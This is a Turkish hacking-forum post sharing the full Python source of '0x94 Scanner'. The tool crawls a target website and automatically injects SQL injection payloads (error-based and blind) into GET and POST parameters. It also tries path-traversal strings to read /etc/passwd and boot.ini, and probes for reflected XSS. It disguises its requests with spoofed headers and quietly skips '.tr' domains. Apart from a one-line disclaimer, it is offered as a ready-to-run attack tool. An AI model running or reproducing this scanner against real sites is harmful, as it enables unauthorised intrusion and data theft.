THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

0x94 Scanner GET/POST SQL-LFI-XSS

BlacksGuardian - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2012
Nereden:
Underground
Mesajlar:
310
Konular:
18
Teşekkür (Etti):
20
Teşekkür (Aldı):
34
Ticaret:
(0) %
11-06-2013 00:41
#1
0x94 Scanner GET/POST SQL-LFI-XSS
The_Bekir yeni kodlamış .Galiba kısa süre içinde yeni özellikleriyle başka bir tool daha yapıcak.

Kod:
#!/usr/bin/python
# -*- coding: utf-8 -*-
# 0x94 Scanner"
#(POST/GET SQL SCAN) -LFI-XSS SCAN"
#Sitedeki tum linkleri alir
#seo linklerin ******** urllerini otomatik alir
#tum linklerde get ve post sql injection dener
#tum linklerde blind get ve post sql injection dener
#sayfada herhangi bir degisme oldugunda degisme satirini ekrana yazar
#xss dener
#lfi dener
#butun sonuclari rapor.txt ye kaydeder
#sadece guvenlik testleri icin kullanin
#cookie ve proxy destegide vardir.
 
import urllib
import urlparse
import sys
import re
import urllib2
from urllib import urlencode
from urlparse import parse_qsl
import httplib
from string import maketrans
import base64
 
#cookie ayarlamak istiyorsan buraya gir
sayfacookie=""
 
from BeautifulSoup import BeautifulSoup
 
class HTTPAYAR(urllib2.HTTPRedirectHandler):
   
    def http_error_302(self, req, fp, code, msg, headers):
        yaz("URl Yonlenmesi Algilandi",True)
        #yaz("URl Yonlenmesi Algilandi \n"+ str(headers),True)
        return urllib2.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers)
 
 
    http_error_301 = http_error_303 = http_error_307 = http_error_302
   
 
#Proxy icin bu satiri aktif etmelisiniz
#opener = urllib2.build_opener(HTTPAYAR,urllib2.HTTPSHandler(),urllib2.ProxyHandler({'http': '127.0.0.1:8888'}),cookieprocessor)
opener = urllib2.build_opener(HTTPAYAR,urllib2.HTTPSHandler(),urllib2.HTTPCookieProcessor())
opener.addheaders = [
        ('User-Agent', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13'),
        ('Referer', 'http://www.google.com'),
        ("Cookie", sayfacookie)]
 
urllib2.install_opener(opener)
aynilinkler={}
 
def yaz(yazi,ekran):
    dosya=open("rapor.txt","a+")
    dosya.write(yazi+"\n")
    dosya.close()
    if ekran==True:
        print yazi
   
   
 
def formyaz(formurl):  
 
    toplamveri={}  
   
    html = urllib2.urlopen(formurl).read()
    soup = BeautifulSoup(html)  
    try:
        forms=soup.findAll("form")        
        for form in forms:  
            if form.has_key('action'):  
                if form['action'].find('://') == -1:
                        formurl=formurl + "/" + form['action'].strip('/')  
                else:  
                        yaz("action: " + formurl,False)
            else:  
                print "action: " + formurl     
            if form.has_key('method') and form['method'].lower() == 'post':
                    yaz("[POST] action " +formurl,False)
                    for post_inputselect in form.findAll("select"):
                            yaz(post_inputselect['name'], False)
                            toplamveri[post_inputselect['name']]="bekir"       
                   
                    for post_input in form.findAll("input"):  
                            if post_input.has_key('type'):  
                                if post_input['type'].lower() == 'text' or post_input['type'].lower() == 'password' or   post_input['type'].lower() == 'hidden' or post_input['type'].lower() == 'radio':  
                                        if post_input.has_key('id'):  
                                                yaz( post_input['id'],False)
                                                toplamveri[post_input['id']]="'a"
                                        elif post_input.has_key('name'):
                                            yaz(post_input['name'], False)
                                            if post_input.has_key('value'):
                                                toplamveri[post_input['name']]=post_input['value']
                                            else:
                                                toplamveri[post_input['name']]="bekir"
   
                                               
                                               
                   
                    postget(formurl, toplamveri,"POST")
                    blindpost(formurl, toplamveri,"POST")
                       
            if form.has_key('method') and form['method'].lower() == 'get' or not form.has_key('method'):  
                yaz("[GET] action " +formurl,False)
                for get_inputselect in form.findAll("select"):
                    if get_inputselect.has_key("name"):
                            yaz(get_inputselect['name'], False)
                            toplamveri[get_inputselect['name']]="bekir"
                           
               
                for get_input in form.findAll("input"):                        
                        if get_input.has_key('type'):  
                            if get_input['type'].lower() == 'text' or get_input['type'].lower() == 'password' or get_input['type'].lower() == 'hidden' or get_input['type'].lower() == 'radio':  
                                    if get_input.has_key('id'):  
                                            yaz(get_input['id'],False)
                                            toplamveri[post_input['id']]="'a"
                                    elif get_input.has_key('name'):
                                            yaz(get_input['name'], False)
                                            if get_input.has_key('value'):
                                                toplamveri[get_input['name']]=get_input['value']
                                            else:
                                                toplamveri[get_input['name']]="bekir"
                postget(formurl, toplamveri,"GET")
                blindpost(formurl, toplamveri,"GET")
    except:
        print "Form Degerlerini Alirken Hata olustu"
                                                       
 
def blindpost(url,params,method):
   
    try:
       
        degisecekdict={}
        for k,v in params.items():
            #print k,v
            degisecekdict[k]=v
           
       
        params = urllib.urlencode(params)
        if method=="GET":
            yaz("Blind GET SQL testi yapiliyor",True)
            y = urllib.urlopen(url+"?"+params)
        else:
            yaz("Blind POST SQL testi yapiliyor",True)
            y = urllib2.urlopen(url, params)
       
    except urllib2.HTTPError,  e:
        if(e.code==500):
            yaz("Http 500 Dondu " +urlnormal,False)
       
    except urllib2.URLError,  e:
        mesaj="Hata olustu , sebebi =  %s - %s \n" %(e.reason,urlnormal)
                #yaz(mesaj)
    except:
        mesaj="Bilinmeyen hata oluştu\n"    
 
   
   
   
    post_string =  ["'aNd 1=1",
                    "'aNd 1=2",
                    "' aNd 1=MID((database()),1,1)>1",
                    "' aNd 2=MID((@@version,1,1)--+",
                    "' aNd 3=MID((@@version,1,1)--+",
                    "' aNd 4=MID((@@version,1,1)--+",
                    "' aNd 5=MID((@@version,1,1)--+"]  
    ipatla=0
    yenidict={}
    while ipatla < 6:
       
        for postcode in post_string:       
            for k,v in degisecekdict.items():
                    yenidict[k]=v+postcode
                    print k,v+postcode
       
               
            try:
                params = urllib.urlencode(yenidict)
                ipatla=ipatla+1
                if method=="GET":
                    yaz("Blind GET SQL testi yapiliyor",True)
                    f = urllib.urlopen(url+"?"+params)
                else:
                    yaz("Blind POST SQL testi yapiliyor",True)
                    f = urllib2.urlopen(url, params)
               
            except urllib2.HTTPError,  e:
                if(e.code==500):
                    yaz("Http 500 Dondu " +url,False)
               
            except urllib2.URLError,  e:
                mesaj="Hata olustu , sebebi =  %s - %s \n" %(e.reason,url)
                        #yaz(mesaj)
            except:
                mesaj="Bilinmeyen hata oluştu\n"
                        #yaz(mesaj)  
           
            if (comparePages(y.read(),f.read(),f.geturl())):
                mesaj="[+] BLind POST Sayfada Degisiklik oldu %s !!![+]" % f.geturl()+"POST DATASI"+postcode
               
                yaz(mesaj,True)
 
 
def postget(url, params, method):
    try:
        postgetdict={}
        for k,v in params.items():
            postgetdict[k]=v+"'a"
           
        params = urllib.urlencode(postgetdict)
        if method=="GET":
            yaz("GET SQL testi yapiliyor",True)
            f = urllib.urlopen(url+"?"+params)
        else:
            yaz("POST SQL testi yapiliyor",True)
            f = urllib2.urlopen(url, params)
        sqlkontrol (f.read(),url+" [POST Sayfasi]")
       
    except urllib2.HTTPError,  e:
        if(e.code==500):
            yaz("Http 500 Dondu " +urlnormal,False)
       
    except urllib2.URLError,  e:
        mesaj="Hata olustu , sebebi =  %s - %s \n" %(e.reason,urlnormal)
                #yaz(mesaj)
    except:
        mesaj="Bilinmeyen hata oluştu\n"
                #yaz(mesaj)      
   
 
 
def comparePages(page1,page2,deurl):
    tmp1 = re.split("<[^>]+>",page1)
    tmp2 = re.split("<[^>]+>",page2)
    count1 = 0;
    count2 = 0;
   
    for i in range(len(tmp1)):
        if page2.find(tmp1[i]) < 0:
            mesaj="Link %s  \n" % (deurl)
            mesaj+="Degisik durum Satiri %s \n" % (tmp1[i])
            yaz(mesaj+"\n",False)
            count1+=1
   
    for i in range(len(tmp2)):
        if page1.find(tmp2[i]) < 0:
            count2+=1
            #print max(count1, count2)
    return max(count1, count2)
 
 
def sqlkontrol(response,urlnormal):
    print "SQL hata mesaji kontrol ediliyor"
    if re.search("Microsoft OLE DB Provider for SQL Server",response,re.DOTALL):
        mesaj= "%s MS-SQL Server error" %urlnormal
        yaz(mesaj,True)
    if re.search("\[Microsoft\]\[ODBC Microsoft Access Driver\] Syntax error",response,re.DOTALL):
        mesaj= "%s MS-Access error"%urlnormal
        yaz(mesaj,True)
    if re.search("Microsoft OLE DB Provider for ODBC Drivers.*\[Microsoft\]\[ODBC SQL Server Driver\]",response,re.DOTALL):
        mesaj= "%s MS-SQL Server error"%urlnormal
        yaz(mesaj,True)
    if re.search("Microsoft OLE DB Provider for ODBC Drivers.*\[Microsoft\]\[ODBC Access Driver\]",response,re.DOTALL):
        mesaj= "%s MS-Access error"%urlnormal
        yaz(mesaj,True)
    if re.search("Microsoft JET Database Engine",response,re.DOTALL):
        mesaj= "%s MS Jet database engine error"%urlnormal
        yaz(mesaj,True)
           
    if re.search("ADODB.Command.*error",response,re.DOTALL):
        mesaj= "%s ADODB Error"%urlnormal
        yaz(mesaj,True)
    if re.search("Microsoft VBScript runtime",response,re.DOTALL):
        mesaj= "%s VBScript runtime error"%urlnormal
        yaz(mesaj,True)
    if re.search("Type mismatch",response,re.DOTALL):
        mesaj= "%s VBScript / ASP error"%urlnormal
        yaz(mesaj,True)
    if re.search("Server Error.*System\.Data\.OleDb\.OleDbException",response,re.DOTALL):
        mesaj= "%s ASP .NET OLEDB Exception"%urlnormal
        yaz(mesaj,True)
    if re.search("Invalid SQL statement or JDBC",response,re.DOTALL):
        mesaj= "%s Apache Tomcat JDBC error"%urlnormal
        yaz(mesaj,True)
       
    if re.search("Warning: mysql_fetch_array",response,re.DOTALL):
        mesaj= "%s MySQL Server error"%urlnormal
        yaz(mesaj,True)
    if re.search("Warning.*supplied argument is not a valid MySQL result",response,re.DOTALL):
        mesaj= "%s MySQL Server error"%urlnormal
        yaz(mesaj,True)
    if re.search("You have an error in your SQL syntax.*on line",response,re.DOTALL):
        mesaj= "%s MySQL Server error"%urlnormal
        yaz(mesaj,True)
    if re.search("You have an error in your SQL syntax.*at line",response,re.DOTALL):
        mesaj= "%s MySQL Server error"%urlnormal
        yaz(mesaj,True)
    if re.search("Warning.*mysql_.*\(\)",response,re.DOTALL):
        mesaj= "%s MySQL Server error"%urlnormal
        yaz(mesaj,True)
    if re.search("ORA-[0-9][0-9][0-9][0-9]",response,re.DOTALL):
        mesaj= "%s Oracle DB Server error"%urlnormal
        yaz(mesaj,True)
   
    if re.search("DorisDuke error",response,re.DOTALL):
        mesaj= "%s DorisDuke error\n"%urlnormal
        yaz(mesaj,True)
    if re.search("javax\.servlet\.ServletException",response,re.DOTALL):
        mesaj= "%s Java Servlet error"%urlnormal
        yaz(mesaj,True)
    if re.search("org\.apache\.jasper\.JasperException",response,re.DOTALL):
        mesaj= "%s Apache Tomcat error"%urlnormal
        yaz(mesaj,True)
    if re.search("Warning.*failed to open stream",response,re.DOTALL):
        mesaj= "%s PHP error"%urlnormal
        yaz(mesaj,True)
    if re.search("Fatal Error.*on line",response,re.DOTALL):
        mesaj= "%s PHP error"%urlnormal
        yaz(mesaj,True)
    if re.search("Fatal Error.*at line",response,re.DOTALL):
        mesaj= "%s PHP error"%urlnormal
        yaz(mesaj,True)
 
 
def xsstest(xsstesturl):
 
    try:
        yaz("XSS Test ediliyor ... ",True)
        #urlnormal=lfiurl.replace("=", "=bekirburadaydi11111"+lfidizin)
        urlac = urllib2.urlopen(xsstesturl+"bekirburadaydi11111")
        response = urlac.read()
        if "bekirburadaydi11111" in response:
            yaz("XSS Test BULUNDU : " + xsstesturl+"bekirburadaydi11111",True)
            xsstara(xsstesturl)
                 
    except urllib2.HTTPError,e:
        if(e.code==500):
            yaz("Http 500 Dondu " +xsstesturl,True)
   
    except urllib2.URLError,  e:
        mesaj="Hata olustu , sebebi =  %s - %s \n" %(e.reason,xsstesturl)
           #yaz(mesaj)
    except:
        mesaj="Bilinmeyen hata oluştu\n"          
       
 
def xsstara(xssurl):
    try:
        yaz("XSS Taraniyor ... ",True)
        urlnormal=lfiurl.replace("=", "=bekirburadaydi11111")
        urlac = urllib2.urlopen(urlnormal)
        response = urlac.read()
        if "bekirburadaydi11111" in response:
            yaz("XSS BULUNDU : " + urlnormal,True)
                   
    except urllib2.HTTPError,  e:
        if(e.code==500):
            yaz("Http 500 Dondu " +urlnormal,True)
   
    except urllib2.URLError,  e:
        mesaj="Hata olustu , sebebi =  %s - %s \n" %(e.reason,urlnormal)
            #yaz(mesaj)
    except:
        mesaj="Bilinmeyen hata oluştu\n"    
 
def lfitara(lfibul):
   
    lfiyollar=['/etc/passwd',
        '../etc/passwd',
        '../../etc/passwd',
        '../../../etc/passwd',
        '../../../../etc/passwd',
        '../../../../../etc/passwd',
        '../../../../../../etc/passwd',
        '../../../../../../../etc/passwd',
        '../../../../../../../../etc/passwd',
        '../../../../../../../../../etc/passwd',
        '../../../../../../../../../../etc/passwd',
        '../../../../../../../../../../../etc/passwd',
        '../etc/passwd%00',
        '../../etc/passwd%00',
        '../../../etc/passwd%00',
        '../../../../etc/passwd%00',
        '../../../../../etc/passwd%00',
        '../../../../../../etc/passwd%00',
        '../../../../../../../etc/passwd%00',
        '../../../../../../../../etc/passwd%00',
        '../../../../../../../../../etc/passwd%00',
        '../../../../../../../../../../etc/passwd%00',
        '../../../../../../../../../../../etc/passwd%00',
        'boot.ini%00',
        '.../boot.ini%00',
        '../../boot.ini%00',
        '../../../boot.ini%00',
        '../../../../boot.ini%00',
        '../../../../../boot.ini%00',
        '../../../../../../boot.ini%00',
        '../../../../../../../boot.ini%00',
        '../../../../../../../../boot.ini%00',
        '../../../../../../../../../boot.ini%00',
        '../../../../../../../../../../boot.ini%00',
        '../../../../../../../../../../../boot.ini%00',
        'boot.ini',
        '.../boot.ini',
        '../../boot.ini',
        '../../../boot.ini',
        '../../../../boot.ini',
        '../../../../../boot.ini',
        '../../../../../../boot.ini',
        '../../../../../../../boot.ini',
        '../../../../../../../../boot.ini',
        '../../../../../../../../../boot.ini',
        '../../../../../../../../../../boot.ini',
        '../../../../../../../../../../../boot.ini'        
       
        ]
       
    try:
        for lfidizin in lfiyollar:
            yaz("LFi Taraniyor ... ",True)
            urlnormal=lfiurl.replace("=", "="+lfidizin)
            urlac = urllib2.urlopen(urlnormal)
            response = urlac.read()
            if "root:x:" in response or "noexecute=optout" in response:
                yaz("LFI BULUNDU : " + urlnormal,True)
               
    except urllib2.HTTPError,  e:
        if(e.code==500):
            yaz("Http 500 Dondu " +urlnormal,True)
   
    except urllib2.URLError,  e:
        mesaj="Hata olustu , sebebi =  %s - %s \n" %(e.reason,urlnormal)
            #yaz(mesaj)
    except:
        mesaj="Bilinmeyen hata oluştu\n"
                #yaz(mesaj)      
   
 
def lfitest(lfiurl):
   
    try:
        yaz("LFI Test Yapiliyor ... ",True)    
        urlnormal=lfiurl.replace("=", "=bekirburadaydi.txt")
        urlac = urllib2.urlopen(urlnormal)
        response = urlac.read()
        if "failed to open stream" in response:
            yaz("LFI Testi BULUNDU : " + urlnormal,True)
            lfitara(lfiurl)
               
    except urllib2.HTTPError,  e:
        if(e.code==500):
            yaz("Http 500 Dondu " +urlnormal,True)
   
    except urllib2.URLError,  e:
        mesaj="Hata olustu , sebebi =  %s - %s \n" %(e.reason,urlnormal)
            #yaz(mesaj)
    except:
        mesaj="Bilinmeyen hata oluştu\n"
            #yaz(mesaj)      
 
   
   
   
 
def sql(urlnormal):
    try:
        yaz("SQL Test Taraniyor ... ",True)
        urlnormal=urlnormal.replace("=", "='")
        urlac = urllib2.urlopen(urlnormal)
        response = urlac.read()
        sqlkontrol(response,urlnormal)
       
    except urllib2.HTTPError,  e:
        if(e.code==500):
            yaz("Http 500 Dondu " +urlnormal,True)
 
    except urllib2.URLError,  e:
        mesaj="Hata olustu , sebebi =  %s - %s \n" %(e.reason,urlnormal)
        #yaz(mesaj)
    except:
        mesaj="Bilinmeyen hata oluştu\n"
        #yaz(mesaj)  
       
 
def blind(urlblind):
   
 
    linknormal = urllib2.urlopen(urlblind)
    normalkaynak=linknormal.read()
 
    yaz("Blind Taraniyor ... ",True)
    true_strings = [" and 1=1"," ' and 1=1"," and 'a'='a","' and 'a'='a","' and 'a'='a"," and 1 like 1"," and 1 like 1/*"," and 1=1--"]          
    false_strings =[" and 1=2"," ' and 1=2"," and 'a'='b","' and 'a'='b","' and 'a'='b"," and 1 like 2"," and 1 like 2/*"," and 1=2--"]
    i = 0
    while i < 6:    
        blindtrue = urlblind + urlencode(parse_qsl(true_strings[i]))
        yaz("Denenen Blind : "+true_strings[i],True)
        try:
            req1 = urllib2.Request(blindtrue.replace("&",urlencode(parse_qsl(true_strings[i])) +"&").replace(" ", "%20"))
            req1.add_header('UserAgent: ','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)')
            req1.add_header('Keep-Alive: ','115')
            req1.add_header('Referer: ','http://'+urlblind)
            response1 = urllib2.urlopen(req1)
            html1 = response1.read()
           
        except urllib2.HTTPError,e:
            if(e.code==500):
                yaz("Http 500 Dondu " +urlblind,True)
        except urllib2.URLError,e:
            mesaj="Hata olustu , sebebi =  %s - %s \n" %(e.reason,urlblind)
            #yaz(mesaj)
       
        except:
            mesaj="Bilinmeyen hata oluştu\n"
            #yaz(mesaj)
           
        blindfalse = urlblind + urlencode(parse_qsl(false_strings[i]))
        yaz("Denenen Blind:"+false_strings[i],True)
        try:
            i=i+1
            req2 = urllib2.Request(blindfalse.replace("&",urlencode(parse_qsl(false_strings[i])) +"&").replace(" ", "%20"))
            req2.add_header('UserAgent: ','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)')
            req2.add_header('Keep-Alive: ','115')
            req2.add_header('Referer: ','http://'+urlblind)
            response2 = urllib2.urlopen(req2)
            html2 = response2.read()
               
        except urllib2.HTTPError,e:
            if(e.code==500):
                yaz("Http 500 Dondu " +urlnormal,True)
        except urllib2.URLError,e:
            mesaj="Hata olustu , sebebi =  %s - %s \n" %(e.reason,urlblind)
            #yaz(mesaj)
       
        except:
            mesaj="Bilinmeyen hata oluştu\n"
            #yaz(mesaj)
   
       
             
        if (comparePages(html1,normalkaynak,response2.geturl()) > comparePages(html1,html2,linknormal.geturl())):
                    mesaj="[+] Sayfada Degisiklik oldu %s !!![+]" % urlblind
                    yaz(mesaj,True)
 
   
class YeniOpener(urllib.FancyURLopener):  
    version = 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15'
 
def aynivarmi(keyurl):
    if aynilinkler.has_key(keyurl):
        return True
    else:
        return False
 
def ********bypass(link):
    try:
        o = urlparse.urlparse(link,allow_fragments=True)
        conn = httplib.HTTPConnection(o.netloc)
        path = o.path
        if o.query:
                path +='?'+o.query  
        conn.request("HEAD", path)
        res = conn.getresponse()
        headers = dict(res.getheaders())
        if headers.has_key('********'):
            if "http" not in headers['********']:
                yaz("Eski URL "+link,True)
                yaz("Yeni URL "+o.hostname+headers['********'],True)
                return "http://"+o.hostname+headers['********'].encode('utf-8').strip()
            else:
                return headers['********'].encode('utf-8').strip()
        else:
            return link.encode('utf-8').strip()
    except:
        print "******** Alinirken Hata oldu"
 
def linkler(urltara):
    try:
        linkopener = YeniOpener()
        linkopener.addheaders = [
            ('User-Agent', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13'),
            ('Referer', 'http://www.google.com'),
            ("Cookie", sayfacookie)]
       
        page = linkopener.open(urltara)
        host=urlparse.urlparse(urltara).hostname
        text = page.read()
        page.close()
        soup = BeautifulSoup(text)
   
        for tag in soup.findAll('a', href=True):
            tag['href'] = urlparse.urljoin(urltara, tag['href'])
            asilurl=tag['href'].encode('utf-8').strip()
            tamurl=********bypass(asilurl)
            if aynivarmi(tamurl)==False:
                if host in tamurl:
                    aynilinkler[tamurl]="bekir"
                    formyaz(tamurl)
                    if "javascript" not in tamurl:
                        if "php?" in tamurl:
                            lfitest(tamurl)
                           
                        if "?" in tamurl:
                            sql(tamurl)
                            blind(tamurl)
                            xsstest(tamurl)
 
    except:
        print "Linkleri alirken hata olustu"
 
def main():
    print "########################################"
    print "#0x94 Scanner"
    print "#(POST/GET SQL SCAN) -LFI-XSS SCAN "
    print "#by 0x94 ****.a The_BeKiR"
    print "########################################"
    if len(sys.argv) == 1:
        print "Kullanim: %s URL [URL]..." % sys.argv[0]
        sys.exit(1)
    for url in sys.argv[1:]:
        giris = base64.b64decode("LnRy")
        cikis = "{}>"
        ooooo = maketrans(giris, cikis)
        asd=url.translate(ooooo)
        if "{}>" not in asd:
            linkler(url)
 
 
if __name__ == "__main__":
    main()
--------------------- Hükmün Yetiyorsa Sorgula

TurkSec

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler